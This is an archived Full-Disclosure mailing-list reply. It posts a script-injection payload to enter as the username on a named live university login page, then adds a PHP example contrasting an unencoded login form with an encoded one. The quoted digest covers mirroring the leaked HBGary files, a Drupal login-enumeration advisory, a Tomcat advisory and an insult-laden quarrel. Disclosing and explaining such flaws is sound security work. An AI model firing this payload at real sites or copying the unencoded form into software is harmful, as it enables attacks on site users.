Re: [Full-disclosure] Full-Disclosure Digest, Vol 72, Issue 44
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Full-Disclosure Digest, Vol 72, Issue 44
- From: Friedrich Hausberger <fhausberger@xxxxxxxxx>
- Date: Sat, 19 Feb 2011 14:29:17 +0100
Hello!
Try:
"><script>alert(/XSS/)</script>
as a username in
http://chemistry.cos.ucf.edu/webadmin/login/index.php
only 40 seconds of research to find it :-)
regards
FHausberger
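
Added example (not part of the original post, and not code from the site it names): why a username beginning with `">` matters when a login form writes the submitted value back into a `value` attribute, shown unencoded and with output encoding. The form markup and all function names are hypothetical, the sample input is the string quoted in the post, and PHP's DOM extension is assumed to be available.

```php
<?php
declare(strict_types=1);

// Sample input: the username string quoted in the post above.
const SAMPLE_USERNAME = '"><script>alert(/XSS/)</script>';

// Hypothetical "before": the submitted username is written back into the
// value attribute as-is, so a double quote in the input ends the attribute
// and whatever follows is parsed as markup.
function render_login_form_unsafe(string $username): string
{
    return '<form method="post" action="index.php">'
         . '<input type="text" name="username" value="' . $username . '">'
         . '<input type="password" name="password">'
         . '</form>';
}

// Encode at the point of output. ENT_QUOTES encodes both quote characters
// (the attribute delimiter is what the sample input relies on);
// ENT_SUBSTITUTE replaces invalid UTF-8 rather than returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical "after": the same form with the username encoded for HTML.
function render_login_form_safe(string $username): string
{
    return '<form method="post" action="index.php">'
         . '<input type="text" name="username" value="' . h($username) . '">'
         . '<input type="password" name="password">'
         . '</form>';
}

// Parse the markup with the DOM extension (libxml2) and report what the
// username turned into: how many <script> elements exist, and what the
// username field's value attribute holds after parsing.
function inspect_markup(string $html): array
{
    $doc = new DOMDocument();
    $previous = libxml_use_internal_errors(true); // keep parser warnings quiet
    $doc->loadHTML($html);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $value = null;
    foreach ($doc->getElementsByTagName('input') as $input) {
        if ($input->getAttribute('name') === 'username') {
            $value = $input->getAttribute('value');
        }
    }

    return [
        'script_elements' => $doc->getElementsByTagName('script')->length,
        'username_value'  => $value,
    ];
}

// Compare both renderings of the same input.
$renderers = [
    'unsafe' => 'render_login_form_unsafe',
    'safe'   => 'render_login_form_safe',
];
foreach ($renderers as $label => $render) {
    $result = inspect_markup($render(SAMPLE_USERNAME));
    printf(
        "%-6s script elements: %d, username field holds the input intact: %s\n",
        $label,
        $result['script_elements'],
        $result['username_value'] === SAMPLE_USERNAME ? 'yes' : 'no'
    );
}
```
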
On 19/02/11 12:04, full-disclosure-request@xxxxxxxxxxxxxxxxx wrote:
>
> Today's Topics:
>
> 1. Re: Fwd: HBGary Mirrors? (Cal Leeming [Simplicity Media Ltd])
> 2. Re: Fwd: HBGary Mirrors? (Cal Leeming [Simplicity Media Ltd])
> 3. Re: HBGary Mirrors? (Valdis.Kletnieks@xxxxxx)
> 4. Re: (this thread is now about porn).?
> (Cal Leeming [Simplicity Media Ltd])
> 5. Re: HBGary Mirrors? (Valdis.Kletnieks@xxxxxx)
> 6. Re: HBGary Mirrors? (Cal Leeming [Simplicity Media Ltd])
> 7. Brute Force and Abuse of Functionality vulnerabilities in
> Drupal (MustLive)
> 8. Re: Fwd: HBGary Mirrors? (Cal Leeming [Simplicity Media Ltd])
> 9. Re: HBGary Mirrors? (Valdis.Kletnieks@xxxxxx)
> 10. Re: Brute Force and Abuse of Functionality vulnerabilities in
> Drupal (Justin Klein Keane)
> 11. Re: Fwd: HBGary Mirrors? (Jeffrey Walton)
> 12. [ MDVSA-2011:030 ] tomcat5 (security@xxxxxxxxxxxx)
> 13. Deadline extension | MOBILITY 2011 || July 17-22, 2011 -
> Bournemouth, UK (Alejandro Cánovas Solbes)
> 14. [ MDVSA-2011:031 ] python-django (security@xxxxxxxxxxxx)
> 15. Re: Fwd: HBGary Mirrors? (Daniël W. Crompton)
> 16. Re: HBGary Mirrors? (William Warren)
> 17. University of Central Florida Multiple LFI (Hack Talk)
> 18. Re: University of Central Florida Multiple LFI (Madhur Ahuja)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Fri, 18 Feb 2011 19:12:19 +0000
> From: "Cal Leeming [Simplicity Media Ltd]"
> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] Fwd: HBGary Mirrors?
> To: decoder<decoder@xxxxxxxxxxxx>
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <AANLkTi=A=qzbKu1L36Z+1bdxGhNfcA3T0ZUcNg9VQbvr@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Heh, now that would be interesting. I wonder if the "intent" scenario would
> apply to this also?
>
> On Fri, Feb 18, 2011 at 6:56 PM, decoder<decoder@xxxxxxxxxxxx> wrote:
>
>> I can't answer the question but it would be even more interesting to
>> answer this if you're using a One-Time-Pad (i.e. two files of equal size on
>> two different servers, both XORed give you the data). There exists a
>> mathematical proof that neither of the two files leaks a single bit of
>> information of the original data :)
>>
>>
>> Chris
>>
>>
>>
>> On 02/18/2011 07:50 PM, Cal Leeming [Simplicity Media Ltd] wrote:
>>
>> Sorry, when I say eligible, I mean "which server would they be allowed to
>> take down by law?".
>>
>> I'm not too hot on the laws of encryption, but I'm sure there is
>> something which states that hosting encrypted files is not illegal, it's
>> distributing the key which allows you to gain access to those files, which
>> is actually illegal.
>>
>> *DISCLAIMER: I don't know if the above is true or not, so apologies if I
>> got this wrong*
>>
>>
>> On Fri, Feb 18, 2011 at 6:46 PM, ck<c.kernstock@xxxxxxxxxxxxxx> wrote:
>>
>> I go with the server hosting the files since the key should be
>> significantly smaller than the files and therefore much easier to mirror.
>>
>> On Fri, Feb 18, 2011 at 7:37 PM, Cal Leeming [Simplicity Media Ltd]
>> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx> wrote:
>>> So here's a thought.
>>> If illegally distributed files (such as this one) were encrypted and
>> hosted
>>> on one server, and the key hosted on another, which server would
>>> be eligible for take down?
>>>
>>
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>
> ------------------------------
>
> Message: 2
> Date: Fri, 18 Feb 2011 19:11:44 +0000
> From: "Cal Leeming [Simplicity Media Ltd]"
> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] Fwd: HBGary Mirrors?
> To: Charles Morris<cmorris@xxxxxxxxxx>
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <AANLkTimy01XQP-eFHOAVCjzbCd5Wg3ZNw6QPZWMXktAP@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> I'm wondering along the same lines as Thor, based on intent. One of those
> "don't take the piss or the judge is gonna own you" scenarios that would be
> tested in court on a per trial basis. Like, if the files were known to
> contain encrypted info, and if it was proved that you knew the contents of
> those files, then you would be held liable.
>
> @Charles: luckily for me, this is all academic as I've kept as far away as
> possible from this hbgary thing :P
>
> On Fri, Feb 18, 2011 at 6:57 PM, Charles Morris<cmorris@xxxxxxxxxx> wrote:
>
>>> Sorry, when I say eligible, I mean "which server would they be allowed to
>>> take down by law?".
>>> I'm not too hot on the laws of encryption, but I'm sure there is
>> something
>>> which states that hosting encrypted files is not illegal, it's
>> distributing
>>> the key which allows you to gain access to those files, which is actually
>>> illegal.
>>> *DISCLAIMER: I don't know if the above is true or not, so apologies if I
>> got
>>> this wrong*
>>>
>> Attempt A:
>> Cal, I'm not sure on this point off-the-cuff, however encrypted files
>> should* be
>> indistinguishable from random data, so assuming that even if a given LEE
>> has obtained the key and knows that your distributed data is "illegal", you
>> could be held blameless as you have no feasible way to know what the data
>> was.
>>
>> Attempt 2:
>> You could also consider a key and an algorithm a "transform" for a set of
>> random
>> bits, such that once the transform is applied to those bits it would
>> result in something
>> "bad", so you aren't actually distributing "encrypted" "files" at all..
>>
>> just random bits :D
>>
>> *DISCLAIMER: The above will PROBABLY NOT hold in court, so apologies
>> if you get jailed for life
>>
>
> ------------------------------
>
> Message: 3
> Date: Fri, 18 Feb 2011 14:28:02 -0500
> From: Valdis.Kletnieks@xxxxxx
> Subject: Re: [Full-disclosure] HBGary Mirrors?
> To: "Cal Leeming [Simplicity Media Ltd]"
> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<12318.1298057282@localhost>
> Content-Type: text/plain; charset="us-ascii"
>
> On Fri, 18 Feb 2011 18:37:09 GMT, "Cal Leeming [Simplicity Media Ltd]" said:
>> If illegally distributed files (such as this one) were encrypted and hosted
>> on one server, and the key hosted on another, which server would
>> be eligible for take down?
> Questions like that are part of why FreeNet and similar systems were designed.
> Nobody wants to be the test case for a simple question like that one, because
> even if you win the test case, it still sucks. So the obvious thing to do is
> fix things so the simple questions aren't an issue anymore, with the hope that
> the hard questions remain un-askable.
>
> When even the person who stored the file can't tell where the file is, and
> the admin of each participating server has no way of telling what got stored
> on their node, it becomes really hard to draft a proper legal notice (either
> a 17 USC 512 takedown notice, or subpoenas/warrants for more serious stuff).
>
>
>
>
>
> ------------------------------
>
> Message: 4
> Date: Fri, 18 Feb 2011 19:28:12 +0000
> From: "Cal Leeming [Simplicity Media Ltd]"
> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] (this thread is now about porn).?
> To: "andrew.wallace"<andrew.wallace@xxxxxxxxxxxxxx>
> Cc: "full-disclosure@xxxxxxxxxxxxxxxxx"
> <full-disclosure@xxxxxxxxxxxxxxxxx>
> Message-ID:
> <AANLkTimrA6nUJUN_caqFPOjVTFfv1mW6W2KufVBWSbGU@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Andrew, I used to fucking work in a NOC as a security consultant you idiotic
> piece of shit. I also used to spend 12 - 18 hours a day in various
> data centres in Harbour Exchange.
>
> Go and check my linkedin.
>
> Oh and, as promised: http://bit.ly/eQIk4O
>
>
>
> On Fri, Feb 18, 2011 at 7:22 PM, andrew.wallace<
> andrew.wallace@xxxxxxxxxxxxxx> wrote:
>
>> On Fri, Feb 18, 2011 at 4:50 PM, Cal Leeming [Simplicity Media Ltd]<
>> cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx> wrote:
>>> "operations centre email system"
>> When you ever get a job in the industry, which is unlikely because of your
>> criminal record you might get to know what an operations centre is.
>>
>> http://en.wikipedia.org/wiki/Network_operations_center
>>
>> Andrew
>>
>>
>
> ------------------------------
>
> Message: 5
> Date: Fri, 18 Feb 2011 13:24:31 -0500
> From: Valdis.Kletnieks@xxxxxx
> Subject: Re: [Full-disclosure] HBGary Mirrors?
> To: ck<c.kernstock@xxxxxxxxxxxxxx>
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<8886.1298053471@localhost>
> Content-Type: text/plain; charset="us-ascii"
>
> On Fri, 18 Feb 2011 17:24:23 +0100, ck said:
>> So, the FEDs shut down all mirrors of the HBGary files - or didn't they?
> Between the Streisand Effect and things like Tor and FreeNet, the Feds
> will never be sure if they got all the copies or not.
>
> ------------------------------
>
> Message: 6
> Date: Fri, 18 Feb 2011 19:30:49 +0000
> From: "Cal Leeming [Simplicity Media Ltd]"
> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] HBGary Mirrors?
> To: Valdis.Kletnieks@xxxxxx
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <AANLkTi=Th4KjohijmcFWUYYb8Hkq1V_6Qt6vh9-CBwUG@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Oh, I didn't realise that's what FreeNet did, I thought it was a tor
> alternative!
>
> On Fri, Feb 18, 2011 at 7:28 PM,<Valdis.Kletnieks@xxxxxx> wrote:
>
>> On Fri, 18 Feb 2011 18:37:09 GMT, "Cal Leeming [Simplicity Media Ltd]"
>> said:
>>> If illegally distributed files (such as this one) were encrypted and
>> hosted
>>> on one server, and the key hosted on another, which server would
>>> be eligible for take down?
>> Questions like that are part of why FreeNet and similar systems were
>> designed.
>> Nobody wants to be the test case for a simple question like that one,
>> because
>> even if you win the test case, it still sucks. So the obvious thing to do
>> is
>> fix things so the simple questions aren't an issue anymore, with the hope
>> that
>> the hard questions remain un-askable.
>>
>> When even the person who stored the file can't tell where the file is, and
>> the admin of each participating server has no way of telling what got
>> stored
>> on their node, it becomes really hard to draft a proper legal notice
>> (either
>> a 17 USC 512 takedown notice, or subpoenas/warrants for more serious
>> stuff).
>>
>>
>>
>>
>>
>
> ------------------------------
>
> Message: 7
> Date: Fri, 18 Feb 2011 21:30:37 +0200
> From: "MustLive"<mustlive@xxxxxxxxxxxxxxxxxx>
> Subject: [Full-disclosure] Brute Force and Abuse of Functionality
> vulnerabilities in Drupal
> To:<submissions@xxxxxxxxxxxxxxxxxxxxxxx>,
> <full-disclosure@xxxxxxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
> Message-ID:<00bb01cbcfa2$85e107c0$c103fea9@ml>
> Content-Type: text/plain; format=flowed; charset="windows-1251";
> reply-type=original
>
> Hello list!
>
> I want to warn you about Brute Force and Abuse of Functionality
> vulnerabilities in Drupal.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are Drupal 6.20 and previous versions.
>
> ----------
> Details:
> ----------
>
> Brute Force (WASC-11):
>
> In the login form (http://site/user/) there is no reliable protection against
> brute force attacks. There is no captcha in Drupal itself, and the existing
> Captcha module (http://websecurity.com.ua/4749/) is vulnerable (and also all
> plugins to it, such as reCAPTCHA (http://websecurity.com.ua/4752/)).
>
> Abuse of Functionality (WASC-42):
>
> At the contact page (http://site/contact) and at the page for contacting a user
> (http://site/user/1/contact) there is a possibility to send spam from the
> site to arbitrary e-mails via the function "Send yourself a copy". And by
> using the Insufficient Anti-automation vulnerability it's possible to send
> spam from the site in an automated manner on a large scale. The attack
> using this function is possible only for logged in users.
>
> For automated sending of spam it's necessary to use the before-mentioned
> Insufficient Anti-automation vulnerabilities - there is no captcha in Drupal
> itself, and the existing captcha module is vulnerable (and also all plugins to
> it, such as reCAPTCHA).
>
> I wrote about such Abuse of Functionality vulnerabilities in the article Sending
> spam via sites and creating spam-botnets
> (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006863.html).
>
> Abuse of Functionality (WASC-42):
>
> By requesting specific pages of the site with a login specified
> (http://site/users/user) it's possible to find existing logins of the users
> of the site (i.e. to enumerate logins). If it shows "Access denied" - then such
> a login exists, and if "Page not found" - then not.
>
> When requesting pages for contacting users (http://site/user/1/contact)
> the login of the user is shown (i.e. it's possible to enumerate logins). The attack
> is possible only for logged in users and it'll work only if the
> attacked user turned on the option "Personal contact form" in his profile.
>
> ------------
> Timeline:
> ------------
>
> 2010.12.15 - announced at my site.
> 2010.12.16 - informed developers.
> 2011.02.17 - disclosed at my site.
>
> I mentioned these vulnerabilities at my site
> (http://websecurity.com.ua/4763/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
>
>
> ------------------------------
>
> Message: 8
> Date: Fri, 18 Feb 2011 19:43:18 +0000
> From: "Cal Leeming [Simplicity Media Ltd]"
> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] Fwd: HBGary Mirrors?
> To: Veg<veg@xxxxxxxxxxxxxxx>, full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <AANLkTikHnV+31ff22q2p8JEVxekSiXoUXHWh8m1EgVoF@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> LMAO, that's fucking brilliant. :D
>
> (had to modify the reply a little, Google was picking it up as spam, and
> forcibly not sending out :S)
>
> On Fri, Feb 18, 2011 at 7:37 PM, Cal Leeming [Simplicity Media Ltd]<
> cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx> wrote:
>
>>
>>
>>> On Fri, Feb 18, 2011 at 7:33 PM, Veg<*****> wrote:
>>>
>>>> Pertaining to your question about the key versus the cryptotext:
>>>>
>>>> *http://bit.ly/hSmqvA*
>>>>
>>>>
>>>>
>>>>
>
> ------------------------------
>
> Message: 9
> Date: Fri, 18 Feb 2011 14:45:03 -0500
> From: Valdis.Kletnieks@xxxxxx
> Subject: Re: [Full-disclosure] HBGary Mirrors?
> To: "Cal Leeming [Simplicity Media Ltd]"
> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<13207.1298058303@localhost>
> Content-Type: text/plain; charset="us-ascii"
>
> On Fri, 18 Feb 2011 19:30:49 GMT, you said:
>> Oh, I didn't realise that's what FreeNet did, I thought it was a tor
>> alternative!
> http://en.wikipedia.org/wiki/Freenet
>
> https://freenetproject.org/
>
> It's a semi-alternative. Both address the "make it difficult to trace"
> issue in somewhat similar ways. Tor is probably more famous for its
> "provide an anonymous proxy" function, but also supports "hidden" storage.
> The biggest difference is that in the Tor case, the person running the
> storage knows where the files are and what they are - it's just difficult
> for anybody else to find out where it really is. Freenet is more oriented
> towards totally obfuscated storage, where *nobody* knows what a given file
> is, or where it is actually stored, until you actually fetch it (and even
> then, you don't know where the data came from).
>
> ------------------------------
>
> Message: 10
> Date: Fri, 18 Feb 2011 14:45:46 -0500
> From: Justin Klein Keane<justin@xxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] Brute Force and Abuse of Functionality
> vulnerabilities in Drupal
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<4D5ECC6A.7080501@xxxxxxxxxxxx>
> Content-Type: text/plain; charset=ISO-8859-1
>
> MustLive: you're a little late to this party, see
> http://www.madirish.net/?article=443, published Dec 2009. The other
> issues you mention may already be disclosed. The Drupal Login Security
> module (http://drupal.org/project/login_security) is an effective
> mitigation for some of these problems. Do you do any research before
> you publish these advisories?
>
> Justin Klein Keane
> http://www.MadIrish.net
>
> The digital signature on this message can be confirmed using
> the public key at http://www.madirish.net/gpgkey
>
> On 02/18/2011 02:30 PM, MustLive wrote:
>> Hello list!
>>
>> I want to warn you about Brute Force and Abuse of Functionality
>> vulnerabilities in Drupal.
>>
>> -------------------------
>> Affected products:
>> -------------------------
>>
>> Vulnerable are Drupal 6.20 and previous versions.
>>
>> ----------
>> Details:
>> ----------
>>
>> Brute Force (WASC-11):
>>
>> In the login form (http://site/user/) there is no reliable protection against
>> brute force attacks. There is no captcha in Drupal itself, and the existing
>> Captcha module (http://websecurity.com.ua/4749/) is vulnerable (and also all
>> plugins to it, such as reCAPTCHA (http://websecurity.com.ua/4752/)).
>>
>> Abuse of Functionality (WASC-42):
>>
>> At the contact page (http://site/contact) and at the page for contacting a user
>> (http://site/user/1/contact) there is a possibility to send spam from the
>> site to arbitrary e-mails via the function "Send yourself a copy". And by
>> using the Insufficient Anti-automation vulnerability it's possible to send
>> spam from the site in an automated manner on a large scale. The attack
>> using this function is possible only for logged in users.
>>
>> For automated sending of spam it's necessary to use the before-mentioned
>> Insufficient Anti-automation vulnerabilities - there is no captcha in Drupal
>> itself, and the existing captcha module is vulnerable (and also all plugins to
>> it, such as reCAPTCHA).
>>
>> I wrote about such Abuse of Functionality vulnerabilities in the article Sending
>> spam via sites and creating spam-botnets
>> (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006863.html).
>>
>> Abuse of Functionality (WASC-42):
>>
>> By requesting specific pages of the site with a login specified
>> (http://site/users/user) it's possible to find existing logins of the users
>> of the site (i.e. to enumerate logins). If it shows "Access denied" - then such
>> a login exists, and if "Page not found" - then not.
>>
>> When requesting pages for contacting users (http://site/user/1/contact)
>> the login of the user is shown (i.e. it's possible to enumerate logins). The attack
>> is possible only for logged in users and it'll work only if the
>> attacked user turned on the option "Personal contact form" in his profile.
>>
>> ------------
>> Timeline:
>> ------------
>>
>> 2010.12.15 - announced at my site.
>> 2010.12.16 - informed developers.
>> 2011.02.17 - disclosed at my site.
>>
>> I mentioned these vulnerabilities at my site
>> (http://websecurity.com.ua/4763/).
>>
>> Best wishes & regards,
>> MustLive
>> Administrator of Websecurity web site
>> http://websecurity.com.ua
>>
>
>
>
> ------------------------------
>
> Message: 11
> Date: Fri, 18 Feb 2011 14:48:32 -0500
> From: Jeffrey Walton<noloader@xxxxxxxxx>
> Subject: Re: [Full-disclosure] Fwd: HBGary Mirrors?
> To: "Thor (Hammer of God)"<thor@xxxxxxxxxxxxxxx>
> Cc: "full-disclosure@xxxxxxxxxxxxxxxxx"
> <full-disclosure@xxxxxxxxxxxxxxxxx>
> Message-ID:
> <AANLkTinZt1p4ZzrLQJ-8=KitnZW4=ggpABxphEiYVG6L@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset=windows-1252
>
> On Fri, Feb 18, 2011 at 2:03 PM, Thor (Hammer of God)
> <thor@xxxxxxxxxxxxxxx> wrote:
>> It would ultimately come down to "intent."  Technically of course, the
>> encrypted file is not the original file.  Never will be.  Can't be.  The
>> keys are not either.  Used together they can reproduce the copyright
>> data.  So legally, there would certainly be an interesting argument about
>> what is and what isn't legal.  But there would be plenty of cause for an
>> injunction which would put the kibosh on distribution until that legal
>> decision was made.  It doesn't have to make sense, and it doesn't have to be
>> strictly "legal" but it is up to a judge.  Recall that 9th circuit judge
>> Kermit (I believe) ruled against emails on an ISP's server being in scope for
>> wiretap laws since, at the time the ISP was reading them, they were not "in
>> transit."  Go figure.
>>
>>
>>
>> If a judge ruled that you were purposely encrypting data and distributing
>> keys to get around copyright laws, he could easily rule against you anyway.
> You gotta love "legislating from the bench." It's too bad US
> politicians do such a poor job that others have to fix their mess.
>
> Jeff
>
>
>
> ------------------------------
>
> Message: 12
> Date: Fri, 18 Feb 2011 22:10:00 +0100
> From: security@xxxxxxxxxxxx
> Subject: [Full-disclosure] [ MDVSA-2011:030 ] tomcat5
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<E1PqXaS-0005e2-Kp@xxxxxxxxxxxxxxxxxx>
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> _______________________________________________________________________
>
> Mandriva Linux Security Advisory MDVSA-2011:030
> http://www.mandriva.com/security/
> _______________________________________________________________________
>
> Package : tomcat5
> Date : February 18, 2011
> Affected: 2009.0, 2010.0, 2010.1, Enterprise Server 5.0
> _______________________________________________________________________
>
> Problem Description:
>
> Multiple vulnerabilities have been found and corrected in tomcat5:
>
> When running under a SecurityManager, access to the file system is
> limited but web applications are granted read/write permissions to
> the work directory. This directory is used for a variety of temporary
> files such as the intermediate files generated when compiling JSPs
> to Servlets. The location of the work directory is specified by
> a ServletContext attribute that is meant to be read-only to web
> applications. However, due to a coding error, the read-only setting
> was not applied. Therefore, a malicious web application may modify
> the attribute before Tomcat applies the file permissions. This can be
> used to grant read/write permissions to any area on the file system
> which a malicious web application may then take advantage of. This
> vulnerability is only applicable when hosting web applications from
> untrusted sources such as shared hosting environments (CVE-2010-3718).
>
> The HTML Manager interface displayed web application provided data,
> such as display names, without filtering. A malicious web application
> could trigger script execution by an administrative user when viewing
> the manager pages (CVE-2011-0013).
>
> Packages for 2009.0 are provided as of the Extended Maintenance
> Program. Please visit this link to learn more:
> http://store.mandriva.com/product_info.php?cPath=149&products_id=490
>
> The updated packages have been patched to correct these issues.
> _______________________________________________________________________
>
> References:
>
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3718
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0013
> _______________________________________________________________________
>
> Updated Packages:
>
> f04fe3121f8b1cf579f0cc92099c364a
> 2010.1/i586/tomcat5-servlet-2.4-api-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> ec6163a7e1ee720c01f86b7070ae1a5d
> 2010.1/i586/tomcat5-webapps-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> e480656f0abde41f97e478151a7fc71f
> 2010.1/SRPMS/tomcat5-5.5.28-0.5.0.2mdv2010.2.src.rpm
>
> Mandriva Linux 2010.1/X86_64:
> 405ff9248913717a0249614e3ccdeff4
> 2010.1/x86_64/tomcat5-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 0500f420f913cac42c8c2398182e0b8d
> 2010.1/x86_64/tomcat5-admin-webapps-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> f796e84a6cf4dac452eaaec03b819c97
> 2010.1/x86_64/tomcat5-common-lib-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 3e25bb28dc6c08b2dcbd1a272d01eaec
> 2010.1/x86_64/tomcat5-jasper-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 07e577e2fbc57e40b944478449715240
> 2010.1/x86_64/tomcat5-jasper-eclipse-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 1e688aca310915303d257abaa0c55099
> 2010.1/x86_64/tomcat5-jasper-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 631f812a7a32013ba301cecbeb23163d
> 2010.1/x86_64/tomcat5-jsp-2.0-api-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 5970e0221d6d5386f04316b6805c6bfc
> 2010.1/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> f64a8611f668cd19bafb0a8884c3b998
> 2010.1/x86_64/tomcat5-server-lib-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> ba19195b485e4468780f36010c5215b5
> 2010.1/x86_64/tomcat5-servlet-2.4-api-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> e241ad2d2ea43d6515b61a256fdbc61e
> 2010.1/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> 15718f212c8d29bdbaac81ab40afbd2a
> 2010.1/x86_64/tomcat5-webapps-5.5.28-0.5.0.2mdv2010.2.noarch.rpm
> e480656f0abde41f97e478151a7fc71f
> 2010.1/SRPMS/tomcat5-5.5.28-0.5.0.2mdv2010.2.src.rpm
>
> Mandriva Enterprise Server 5:
> bd71ae4141fbf5a884cfbccc756c8329
> mes5/i586/tomcat5-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 75b8764895d7b231901602dd0605f2e2
> mes5/i586/tomcat5-admin-webapps-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 6c827ad66b01560b72c5a8c96616afaa
> mes5/i586/tomcat5-common-lib-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 1a2155333c323146ef3e1fbdeae96035
> mes5/i586/tomcat5-jasper-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 554ec541f6857a7946a6fae67c0a2fa6
> mes5/i586/tomcat5-jasper-eclipse-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 10b54ca8ebefcd816bade65dae8e408b
> mes5/i586/tomcat5-jasper-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 8a12958fd3040ca0f4ce23bb7a3a1bdf
> mes5/i586/tomcat5-jsp-2.0-api-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 320881d8a847077fc8a7d70d7d0e0a02
> mes5/i586/tomcat5-jsp-2.0-api-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 8ab623786a3479dc5e990b9949a13502
> mes5/i586/tomcat5-server-lib-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> d4c53039181b378a3da1016c137ad843
> mes5/i586/tomcat5-servlet-2.4-api-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 52922ac7e5b4c1a7356d5248cf264a1d
> mes5/i586/tomcat5-servlet-2.4-api-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 6cf03c3b0981031f6bf7b8710990bcb0
> mes5/i586/tomcat5-webapps-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> a4f9e4804454f2d628865ad654d6a188
> mes5/SRPMS/tomcat5-5.5.27-0.3.0.4mdvmes5.1.src.rpm
>
> Mandriva Enterprise Server 5/X86_64:
> 20eee581278206c28db4e304a6756671
> mes5/x86_64/tomcat5-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> d6b1d88885c03c36a84dd7703bb82bbb
> mes5/x86_64/tomcat5-admin-webapps-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> a04900de513cbaf5359b41b1df0e9ff3
> mes5/x86_64/tomcat5-common-lib-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> c58d2e125e9c2e4de256224d64cf1d46
> mes5/x86_64/tomcat5-jasper-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 7612d8a28f5e008405a282ceb265a769
> mes5/x86_64/tomcat5-jasper-eclipse-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 0796bfcd6e042c1128426bb47aae03d5
> mes5/x86_64/tomcat5-jasper-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 2ccd09878fd1f3ef8e4846864bd2f71e
> mes5/x86_64/tomcat5-jsp-2.0-api-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> 1b94570c1a5913fd0eefbcbee71afdc8
> mes5/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.27-0.3.0.4mdvmes5.1.noarch.rpm
> ca2608f81795ff805e34e7316799a6a7
